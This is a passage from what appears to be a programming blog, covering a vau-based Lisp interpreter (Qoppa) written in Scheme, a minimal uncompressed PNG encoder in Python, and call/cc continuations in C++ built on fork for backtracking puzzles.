          (body      (caddr vau-operands)))

        (lambda (dynamic-env operands)
            (m-eval
                (cons
                    (bind
                        (cons env-param   params)
                        (cons dynamic-env operands))
                    static-env)
                body))))

When applying vau, you provide a parameter tree, a name for the caller's environment, and a body. The result of applying vau is an operative which, when applied, evaluates that body. It does so in the environment captured by vau, extended with arguments.

Here's the global environment:

(define (make-global-frame)
    (define (wrap-primitive fun)
        (lambda (env operands)
            (apply fun (map (lambda (exp) (m-eval env exp)) operands))))
    (list
        (list 'vau m-vau)
        (list 'eval    (wrap-primitive m-eval))
        (list 'operate (wrap-primitive m-operate))
        (list 'lookup  (wrap-primitive m-lookup))
        (list 'bool    (wrap-primitive (lambda (b t f) (if b t f))))
        (list 'eq?     (wrap-primitive eq?))
        ; more like these
        ))

(define global-env (list (make-global-frame)))

Other than vau, each built-in operative evaluates all of its arguments. That's what wrap-primitive accomplishes. We can think of these as functions, whereas vau is something more exotic.

We expose the interpreter's m-eval and m-operate, which are essential for building new features as library code. We could implement lookup as library code; providing it here just prevents some code duplication.

The other functions inherited from Scheme are:

Type predicates: null? symbol? pair?
Pairs: cons car cdr set-car! set-cdr!
Arithmetic: + * - / <= =
I/O: error display open-input-file read eof-object

Scheme as a Qoppa library

The Qoppa interpreter uses Scheme syntax like lambda, define, let, if, etc. Qoppa itself supports none of this; all we get is vau and some basic data types. But this is enough to build a Qoppa library which provides all the Scheme features we used in the interpreter. This code starts out very cryptic, and becomes easier to read as we have more high-level features available. You can read through the full library if you like. This section will go over some of the more interesting parts.

Our first task is a bit of a puzzle: how do you define define? It's only possible because we expose the interpreter's representation of environments. We can push a new binding onto the top frame of env, like so:

(set-car! env
    (cons
        (cons <name> (cons <value> null))
        (car env)))

We use this idea twice, once inside the vau body for define, and once to define define itself.

((vau (name-of-define null) env
    (set-car! env (cons
        (cons name-of-define
            (cons (vau (name exp) defn-env
                    (set-car! defn-env (cons
                        (cons name (cons (eval defn-env exp) null))
                        (car defn-env))))
                null))
        (car env))))
    define ())

Next we'll define Scheme's if, which evaluates one branch or the other. We do this in terms of the Qoppa builtin bool, which always evaluates both branches.

(define if (vau (b t f) env
    (eval env
        (bool (eval env b) t f))))

We already saw the code for list, which evaluates each of its arguments. Many other operatives have this behavior, so we should abstract out the idea of "evaluate all arguments". The operative wrap takes an operative and returns a transformed version of that operative, which evaluates all of its arguments.

(define wrap (vau (operative) oper-env
    (vau args args-env
        (operate args-env
            (eval    oper-env operative)
            (operate args-env list args)))))

Now we can implement lambda as an operative that builds a vau term, evals it, and then wraps the resulting operative.

(define lambda (vau (params body) static-env
    (wrap
        (eval static-env
            (list vau params '_ body)))))

This works just like Scheme's lambda:

(define fact (lambda (n)
    (if (<= n 1)
        1
        (* n (fact (- n 1))))))

Actually, it's incomplete, because Scheme's lambda allows an arbitrary number of expressions in the body. In other words Scheme's

(lambda (x) a b c)

is syntactic sugar for

(lambda (x) (begin a b c))

begin evaluates its arguments in order left to right, and returns the value of the last one. In Scheme it's a special form, because normal argument evaluation happens in an undefined order. By contrast, the Qoppa interpreter implements a left-to-right order, so we'll define begin as a function.

(define last (lambda (xs)
    (if (null? (cdr xs))
        (car xs)
        (last (cdr xs)))))

(define begin (lambda xs (last xs)))

Now we can mutate the binding for lambda to support multiple expressions.

(define set! (vau (name exp) env
    (set-cdr!
        (lookup name env)
        (list (eval env exp)))))

(set! lambda
    ((lambda (base-lambda)
        (vau (param . body) env
            (eval env (list base-lambda param (cons begin body)))))
    lambda))

Note the structure

((lambda (base-lambda) ...) lambda)

which holds on to the original lambda operative, in a private frame. That's right, we're using lambda to save lambda so we can overwrite lambda. We use the same approach when defining other sugar, such as the implicit lambda in define.

There are some more bits of Scheme we need to implement: cond, let, map, append, and so forth. These are mostly straightforward; read the code if you want the full story. By far the most troublesome was Scheme's apply function, which takes a function and a list of arguments, and is supposed to apply the function to those arguments. The problem is that our functions are really operatives, and expect to call eval on each of their arguments. If we already have the values in a list, how do we pass them on?

Qoppa and Kernel have very different solutions to this problem. In Kernel, "applicatives" (things that evaluate all their arguments) are a distinct type from operatives. wrap is the primitive constructor of applicatives, and its inverse unwrap is used to implement apply. This design choice simplifies apply but complicates the core evaluator, which needs to distinguish applicatives from operatives.

For Qoppa I implemented wrap as a library function, which we saw before. But then we don't have unwrap. So apply takes the uglier approach of quoting each argument to prevent double-evaluation.

(define apply (wrap (vau (operative args) env
    (eval env (cons
        operative
        (map (lambda (x) (list quote x)) args))))))

In either Kernel or Qoppa, you're not allowed to apply apply to something that doesn't evaluate all of its arguments.

Testing

The code we saw above is split into two files:

qoppa.scm is the Qoppa interpreter, written in Scheme
prelude.qop is the Qoppa code which defines wrap, lambda, etc.

I defined a procedure execute-file which reads a file from disk and runs each expression through m-eval. The last line of qoppa.scm is

(execute-file "prelude.qop")

so the definitions in prelude.qop are available immediately.

We start by loading qoppa.scm into a Scheme interpreter. I'm using Guile here, but I've actually tested this with a variety of R5RS implementations.

$ guile -l qoppa.scm
guile> (m-eval global-env '(fact 5))
$1 = 120

This establishes that we've implemented the features used by fact, such as define and lambda. But did we actually implement enough to run the Qoppa interpreter? To test this, we need to go deeper.

guile> (execute-file "qoppa.scm")
$2 = done
guile> (m-eval global-env '(m-eval global-env '(fact 5)))
$3 = 120

This is factorial implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme (implemented in C). Of course it's outrageously slow; on my machine this (fact 5) takes about 5 minutes. But it demonstrates that a tiny language of operatives, augmented with an appropriate library, can provide enough syntactic features to run a non-trivial Scheme program. As for how to do this efficiently, well, I haven't got far enough into the literature to have any idea.

Thursday, April 5, 2012

A minimal encoder for uncompressed PNGs

I've often wondered how hard it is to output a PNG file directly, without using a library or a standard tool like pnmtopng. (I'm not sure when you'd actually want to do this; maybe for a tiny embedded system with a web interface.)

I found that constructing a simple, uncompressed PNG does not require a whole lot of code, but there are some odd details I got wrong on the first try. Here's a crash course in writing a minimal PNG encoder. We'll use only a small subset of the PNG specification, but I'll link to the full spec so you can read more.

The example code is not too fast; it's written in Python and has tons of string copying everywhere. My goal was to express the idea clearly, and let you worry about coding it up in C for your embedded system or whatever. If you're careful, you can avoid ever copying the image data.

We will assume the raw image data is a Python byte string (non-Unicode), consisting of one byte each for red, green, and blue, for each pixel in English reading order. For reference, here is how we'd "encode" this data in the much simpler PPM format.

def to_ppm(width, height, data):
    return 'P6\n%d %d\n255\n%s' % (width, height, data)

I lied when I said we'd use no libraries at all. I will import Python's standard struct module. I figured an exercise in converting integers to 4-byte big endian format would be excessively boring. Here's how we do it with struct.

import struct

def be32(n):
    return struct.pack('>I', n)

A PNG file contains a sequence of data chunks, each with an associated length, type, and CRC checksum. The type is a 4-byte quantity which can be interpreted as four ASCII letters. We'll implement crc later.

def png_chunk(ty, data):
    return be32(len(data)) + ty + data + be32(crc(ty + data))

The IHDR chunk, always the first chunk in a file, contains basic header information such as width and height. We will hardcode a color depth of 8 bits, color type 2 (RGB truecolor), and standard 0 values for the other fields.

def png_header(width, height):
    return png_chunk('IHDR',
        struct.pack('>IIBBBBB', width, height, 8, 2, 0, 0, 0))

The actual image data is stored in DEFLATE format, the same compression used by gzip and friends. Fortunately for our minimalist project, DEFLATE allows uncompressed blocks. Each one has a 5-byte header: the byte 0 (or 1 for the last block), followed by a 16-bit data length, and then the same length value with all of the bits flipped. Note that these are little-endian numbers, unlike the rest of PNG. Never assume a format is internally consistent!

MAX_DEFLATE = 0xffff
def deflate_block(data, last=False):
    n = len(data)
    assert n <= MAX_DEFLATE
    return struct.pack('<BHH', bool(last), n, 0xffff ^ n) + data

Since a DEFLATE block can only hold 64 kB, we'll need to split our image data into multiple blocks. We will actually want a more general function to split a sequence into chunks of size n (allowing the last chunk to be smaller than n).

def pieces(seq, n):
    return [seq[i:i+n] for i in xrange(0, len(seq), n)]

PNG wants the DEFLATE blocks to be encapsulated as a zlib data stream. For our purposes, this means we prefix a header of 78 01 hex, and suffix an Adler-32 checksum of the "decompressed" data. That's right, a self-contained PNG encoder needs to implement two different checksum algorithms.

def zlib_stream(data):
    segments = pieces(data, MAX_DEFLATE)

    blocks = ''.join(deflate_block(p) for p in segments[:-1])
    blocks += deflate_block(segments[-1], last=True)

    return '\x78\x01' + blocks + be32(adler32(data))

We're almost done, but there's one more wrinkle. PNG has a pre-compression filter step, which transforms a scanline of data at a time. A filter doesn't change the size of the image data, but is supposed to expose redundancies, leading to better compression. We aren't compressing anyway, so we choose the no-op filter. This means we prefix a zero byte to each scanline.

At last we can build the PNG file. It consists of the magic PNG signature, a header chunk, our zlib stream inside an IDAT chunk, and an empty IEND chunk to mark the end of the file.

def to_png(width, height, data):
    lines = ''.join('\0'+p for p in pieces(data, 3*width))

    return ('\x89PNG\r\n\x1a\n'
        + png_header(width, height)
        + png_chunk('IDAT', zlib_stream(lines))
        + png_chunk('IEND', ''))

Actually, a PNG file may contain any number of IDAT chunks. The zlib stream is given by the concatenation of their contents. It might be convenient to emit one IDAT chunk per DEFLATE block. But the IDAT boundaries really can occur anywhere, even halfway through the zlib checksum. This flexibility is convenient for encoders, and a hassle for decoders. For example, one of many historical PNG bugs in Internet Explorer is triggered by empty IDAT chunks.

Here are those checksum algorithms we need. My CRC function follows the approach of code fragment 5 from Wikipedia. For better performance you would want to precompute a lookup table, as suggested by the PNG spec.

def crc(data):
    c = 0xffffffff
    for x in data:
        c ^= ord(x)
        for k in xrange(8):
            v = 0xedb88320 if c & 1 else 0
            c = v ^ (c >> 1)
    return c ^ 0xffffffff

def adler32(data):
    s1, s2 = 1, 0
    for x in data:
        s1 = (s1 + ord(x)) % 65521
        s2 = (s2 + s1) % 65521
    return (s2 << 16) + s1

Now we can test this code. We'll generate a grid of red-green-yellow gradients, and write it in both PPM and PNG formats.

w, h = 500, 300
img = ''
for y in xrange(h):
    for x in xrange(w):
        img += chr(x % 256) + chr(y % 256) + '\0'

open('out.ppm', 'wb').write(to_ppm(w, h, img))
open('out.png', 'wb').write(to_png(w, h, img))

Then we can verify that the two files contain identical image data.

$ pngtopnm out.png | sha1sum - out.ppm
e19c1229221c608b2a45a4488f9959403b8630a0  -
e19c1229221c608b2a45a4488f9959403b8630a0  out.ppm

That's it! As usual, the code is on GitHub. You can also read what others have written on similar subjects here, here, here, or here.

Tuesday, February 14, 2012

Continuations in C++ with fork

[Update, Jan 2015: I've translated this code into Rust.]

While reading "Continuations in C" I came across an intriguing idea:

It is possible to simulate call/cc, or something like it, on Unix systems with system calls like fork() that literally duplicate the running process.

The author sets this idea aside, and instead discusses some code that uses setjmp/longjmp and stack copying. And there are several other continuation-like constructs available for C, such as POSIX getcontext. But the idea of implementing call/cc with fork stuck with me, if only for its amusement value. I'd seen fork used for computing with probability distributions, but I couldn't find an implementation of call/cc itself. So I decided to give it a shot, using my favorite esolang, C++.

Continuations are a famously mind-bending idea, and this article doesn't totally explain what they are or what they're good for. If you aren't familiar with continuations, you might catch on from the examples, or you might want to consult another source first (1, 2, 3, 4, 5, 6).

Small examples

I'll get to the implementation later, but right now let's see what these fork-based continuations can do. The interface looks like this.

template <typename T>
class cont {
public:
    void operator()(const T &x);
};

template <typename T>
T call_cc( std::function< T (cont<T>) > f );

std::function is a wrapper that can hold function-like values, such as function objects or C-style function pointers. So call_cc<T> will accept any function-like value that takes an argument of type cont<T> and returns a value of type T. This wrapper is the first of several C++11 features we'll use.

call_cc stands for "call with current continuation", and that's exactly what it does. call_cc(f) will call f, and return whatever f returns. The interesting part is that it passes to f an instance of our cont class, which represents all the stuff that's going to happen in the program after f returns. That cont object overloads operator() and so can be called like a function. If it's called with some argument x, the program behaves as though f had returned x.

The types reflect this usage. The type parameter T in cont<T> is the return type of the function passed to call_cc. It's also the type of values accepted by cont<T>::operator().

Here's a small example.

int f(cont<int> k) {
    std::cout << "f called" << std::endl;
    k(1);
    std::cout << "k returns" << std::endl;
    return 0;
}

int main() {
    std::cout << "f returns " << call_cc<int>(f) << std::endl;
}

When we run this code we get:

f called
f returns 1

We don't see the "k returns" message. Instead, calling k(1) bails out of f early, and forces it to return 1. This would happen even if we passed k to some deeply nested function call, and invoked it there.

This nonlocal return is kind of like throwing an exception, and is not that surprising. More exciting things happen if a continuation outlives the function call it came from.

boost::optional< cont<int> > global_k;

int g(cont<int> k) {
    std::cout << "g called" << std::endl;
    global_k = k;
    return 0;
}

int main() {
    std::cout << "g returns " << call_cc<int>(g) << std::endl;

    if (global_k)
        (*global_k)(1);
}

When we run this, we get:

g called
g returns 0
g returns 1

g is called once, and returns twice! When called, g saves the current continuation in a global variable. After g returns, main calls that continuation, and g returns again with a different value.

What value should global_k have before g is called? There's no such thing as a "default" or "uninitialized" cont<T>. We solve this problem by wrapping it with boost::optional. We use the resulting object much like a pointer, checking for "null" and then dereferencing. The difference is that boost::optional manages storage for the underlying value, if any.

Why isn't this code an infinite loop? Because invoking a cont<T> also resets global state to the values it had when the continuation was captured. The second time g returns, global_k has been reset to the "null" optional value. This is unlike Scheme's call/cc and most other continuation systems. It turns out to be a serious limitation, though it's sometimes convenient. The reason for this behavior is that invoking a continuation is implemented as a transfer of control to another process. More on that later.

Backtracking

We can use continuations to implement backtracking, as found in logic programming languages. Here is a suitable interface.

bool guess();
void fail();

We will use guess as though it has a magical ability to predict the future. We assume it will only return true if doing so results in a program that never calls fail. Here is the implementation.

boost::optional< cont<bool> > checkpoint;

bool guess() {
    return call_cc<bool>( [](cont<bool> k) {
        checkpoint = k;
        return true;
    } );
}

void fail() {
    if (checkpoint) {
        (*checkpoint)(false);
    } else {
        std::cerr << "Nothing to be done." << std::endl;
        exit(1);
    }
}

guess invokes call_cc on a lambda expression, which saves the current continuation and returns true. A subsequent call to fail will invoke this continuation, retrying execution in a world where guess had returned false instead. In Scheme et al, we would store a whole stack of continuations. But invoking our cont<bool> resets global state, including the checkpoint variable itself, so we only need to explicitly track the most recent continuation.

Now we can implement the integer factoring example from "Continuations in C".

int integer(int m, int n) {
    for (int i=m; i<=n; i++) {
        if (guess())
            return i;
    }
    fail();
}

void factor(int n) {
    const int i = integer(2, 100);
    const int j = integer(2, 100);

    if (i*j != n)
        fail();

    std::cout << i << " * " << j << " = " << n << std::endl;
}

factor(n) will guess two integers, and fail if their product is not n. Calling factor(391) will produce the output

17 * 23 = 391

after a moment's delay. In fact, you might see this after your shell prompt has returned, because the output is produced by a thousand-generation descendant of the process your shell created.

Solving a maze

For a more substantial use of backtracking, let's solve a maze.

const int maze_size = 15;
char maze[] =
    "X-------------+\n"
    "        |     |\n"
    "|--+  | |   | |\n"
    "|  |  | | --+ |\n"
    "|     |     | |\n"
    "|-+---+--+- | |\n"
    "| |      |    |\n"
    "| | | ---+-+- |\n"
    "|   |      |  |\n"
    "| +-+-+--|    |\n"
    "| |   |  |--- |\n"
    "|     |       |\n"
    "|--- -+-------|\n"
    "|              \n"
    "+------------- \n";

void solve_maze() {
    int x=0, y=0;

    while ((x != maze_size-1)
        || (y != maze_size-1)) {

             if (guess()) x++;
        else if (guess()) x--;
        else if (guess()) y++;
        else              y--;

        if (  (x < 0) || (x >= maze_size) ||
              (y < 0) || (y >= maze_size)  )
            fail();

        const int i = y*(maze_size+1) + x;
        if (maze[i] != ' ')
            fail();
        maze[i] = 'X';
    }

    for (char c : maze) {
        if (c == 'X')
            std::cout << "\e[1;32mX\e[0m";
        else
            std::cout << c;
    }
}

Whether code or prose, the algorithm is pretty simple. Start at the upper-left corner. As long as we haven't reached the lower-right corner, guess a direction to move. Fail if we go off the edge, run into a wall, or find ourselves on a square we already visited.

Once we've reached the goal, we iterate over the char array and print it out with some rad ANSI color codes.

Once again, we're making good use of the fact that our continuations reset global state. That's why we see 'X' marks not on the failed detours, but only on a successful path through the maze. Here's what it looks like.


X-------------+
XXXXXXXX|     |
|--+  |X|   | |
|  |  |X| --+ |
|     |XXXXX| |
|-+---+--+-X| |
| |XXX   | XXX|
| |X|X---+-+-X|
|XXX|XXXXXX|XX|
|X+-+-+--|XXX |
|X|   |  |--- |
|XXXX |       |
|---X-+-------|
|   XXXXXXXXXXX
+-------------X

Excess backtracking

We can run both examples in a single program.

int main() {
    factor(391);
    solve_maze();
}

If we change the maze to be unsolvable, we'll get:

17 * 23 = 391
23 * 17 = 391
Nothing to be done.

Factoring 391 a different way won't change the maze layout, but the program doesn't know that. We can add a cut primitive to eliminate unwanted backtracking.

void cut() {
    checkpoint = boost::none;
}

int main() {
    factor(391);
    cut();
    solve_maze();
}

The implementation

For such a crazy idea, the code to implement call_cc with fork is actually pretty reasonable. Here's the core of it.

template <typename T>
// static
T cont<T>::call_cc(call_cc_arg f) {
    int fd[2];
    pipe(fd);
    int read_fd  = fd[0];
    int write_fd = fd[1];

    if (fork()) {
        // parent
        close(read_fd);
        return f( cont<T>(write_fd) );
    } else {
        // child
        close(write_fd);
        char buf[sizeof(T)];
        if (read(read_fd, buf, sizeof(T)) < ssize_t(sizeof(T)))
            exit(0);
        close(read_fd);
        return *reinterpret_cast<T*>(buf);
    }
}

template <typename T>
void cont<T>::impl::invoke(const T &x) {
    write(m_pipe, &x, sizeof(T));
    exit(0);
}

To capture a continuation, we fork the process. The resulting processes share a pipe which was created before the fork. The parent process will call f immediately, passing a cont<T> object that holds onto the write end of this pipe. If that continuation is invoked with some argument x, the parent process will send x down the pipe and then exit. The child process wakes up from its read call, and returns x from call_cc.

There are a few more implementation details.

If the parent process exits, it will close the write end of the pipe, and the child's read will return 0, i.e. end-of-file. This prevents a buildup of unused continuation processes. But what if the parent deletes the last copy of some cont<T>, yet keeps running? We'd like to kill the corresponding child process immediately.

This sounds like a use for a reference-counted smart pointer, but we want to hide this detail from the user. So we split off a private implementation class, cont<T>::impl, with a destructor that calls close. The user-facing class cont<T> holds a std::shared_ptr to a cont<T>::impl. And cont<T>::operator() simply calls cont<T>::impl::invoke through this pointer.
It would be nice to tell the compiler that cont<T>::operator() won't return, to avoid warnings like "control reaches end of non-void function". GCC provides the noreturn attribute for this purpose.
We want the cont<T> constructor to be private, so we had to make call_cc a static member function of that class. But the examples above use a free function call_cc<T>. It's easiest to implement the latter as a 1-line function that calls the former. The alternative is to make it a friend function of cont<T>, which requires some forward declarations and other noise.

There are a number of limitations too.

As noted, the forked child process doesn't see changes to the parent's global state. This precludes some interesting uses of continuations, like implementing coroutines. In fact, I had trouble coming up with any application other than backtracking. You could work around this limitation with shared memory, but it seemed like too much hassle.
Each captured continuation can only be invoked once. This is easiest to observe if the code using continuations also invokes fork directly. It could possibly be fixed with additional forking inside call_cc.
Calling a continuation sends the argument through a pipe using a naive byte-for-byte copy. So the argument needs to be Plain Old Data, and had better not contain pointers to anything not shared by the two processes. This means we can't send continuations through other continuations, sad to say.
I left out the error handling you would expect in serious code, because this is anything but.
Likewise, I'm assuming that a single write and read will suffice to send the value. Robust code will need to loop until completion, handle EINTR, etc. Or use some higher-level IPC mechanism.
At some size, stack-allocating the receive buffer will become a problem.
It's slow. Well, actually, I'm impressed with the speed of fork on Linux. My machine solves both backtracking problems in about a second, forking about 2000 processes along the way. You can speed it up more with static linking. But it's still far more overhead than the alternatives.

As usual, you can get the code from GitHub.